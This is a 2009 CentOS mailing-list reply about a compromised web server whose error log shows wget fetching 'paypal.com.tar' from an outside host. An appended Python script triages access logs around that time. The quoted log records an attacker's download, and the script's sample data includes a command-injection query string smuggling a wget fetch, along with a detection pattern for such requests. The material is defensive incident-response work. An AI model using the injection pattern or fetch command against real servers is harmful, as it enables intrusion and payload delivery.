[CentOS] httpd - mysql - paypal.com.tar - hacker
John R Pierce
pierce at hogranch.com
Fri Aug 21 21:20:38 UTC 2009
Gregory P. Ennis wrote:
> P.S. I found the following entry in my error_log of /var/log/httpd/ :
>
> [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39
> --00:21:14-- http://code.go.ro/paypal.com.tar
> Resolving code.go.ro... 81.196.20.134
> Connecting to code.go.ro|81.196.20.134|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 645120 (630K) [application/x-tar]
> Saving to: `paypal.com.tar'
>
....
Looks like they spoofed something on your server, probably some kinda
sloppy php, into running wget. I'd take a look at the access_log
around the same timestamp to see if there are any hints as to how they did this.
http://xkcd.com/327/
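
Added example, not part of the original post: one way to do the access_log check suggested in the reply, by pulling every request within a few minutes of the wget time and flagging those whose decoded URL names a download tool or passes a remote URL as a parameter value. The log lines, addresses, paths, the `requests_near` helper, and the date assigned to the wget time are constructed assumptions.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote_plus

# Constructed sample in Apache combined log format (not from the thread).
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [16/Aug/2009:00:19:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Aug/2009:00:21:13 +0000] "GET /gallery.php?dir=%3Bwget%20http%3A%2F%2Fhost.example.invalid%2Fa.tar HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
192.0.2.44 - - [16/Aug/2009:00:21:40 +0000] "GET /images/logo.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Aug/2009:03:02:11 +0000] "GET /gallery.php?dir=%3Bwget%20x HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
"""

# Assumption: the wget line "--00:21:14--" is taken to be 16 Aug 2009, UTC.
WGET_TIME = datetime(2009, 8, 16, 0, 21, 14, tzinfo=timezone.utc)

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) ')
# Download tools or a remote URL passed as a parameter value, after decoding.
SUSPICIOUS = re.compile(r'\b(?:wget|curl)\b|=\s*(?:https?|ftp)://', re.I)

def requests_near(log_text, when, window_minutes=5):
    """Return (time, client, decoded request, flagged) for entries near `when`."""
    window = timedelta(minutes=window_minutes)
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        client, ts_raw, request, _status = m.groups()
        ts = datetime.strptime(ts_raw, "%d/%b/%Y:%H:%M:%S %z")
        if abs(ts - when) > window:
            continue
        # Decode twice so double-encoded payloads (%2520) are still readable.
        decoded = unquote_plus(unquote_plus(request))
        hits.append((ts, client, decoded, bool(SUSPICIOUS.search(decoded))))
    # Flagged requests first, then whatever is closest to the wget time.
    return sorted(hits, key=lambda h: (not h[3], abs(h[0] - when)))

if __name__ == "__main__":
    for ts, client, request, flagged in requests_near(SAMPLE_ACCESS_LOG, WGET_TIME):
        print("!!" if flagged else "  ", ts.isoformat(), client, request)
```

The server's log timezone and the real date of the download have to be confirmed before trusting the window; widen `window_minutes` if the clocks are in doubt.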